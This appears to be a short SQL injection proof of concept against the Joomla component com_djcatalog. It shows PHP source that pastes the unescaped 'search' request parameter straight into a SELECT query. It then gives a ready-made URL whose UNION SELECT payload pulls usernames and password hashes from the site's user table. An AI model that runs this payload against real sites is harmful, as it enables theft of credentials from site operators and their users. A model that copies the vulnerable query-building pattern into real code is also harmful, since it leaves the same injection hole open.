function getAllElements(){ global $mainframe; $par =& $mainframe->getParams('com_djcatalog'); $limit = $par->get('limit_items_show'); $limitstart = JRequest::getVar('limitstart', 0, '', 'int'); $producer_id = JRequest::getVar('pid', 0, '', 'int'); $search = ''; if(JRequest::getVar('search','0','string')!='0'){ $search = " AND name LIKE '%".JRequest::getVar('search','0','string')."%' "; } $producer = ''; if($producer_id){ $producer = ' AND producer_id LIKE '.$producer_id. ''; } $order = JRequest::getVar('order'); $db= &JFactory::getDBO(); switch ($order) { ... } $query = "SELECT * FROM #__djcat_items WHERE 1 ".$producer.$search.$orderQuery; $db->setQuery($query); $Arows = $this->_getList($query, $limitstart, $limit); return $Arows; }
/index.php?option=com_djcatalog&view=show&search='+and+0+union+select+1,2,3,username,5,password,7,8,9,10,11+from+%23__users%23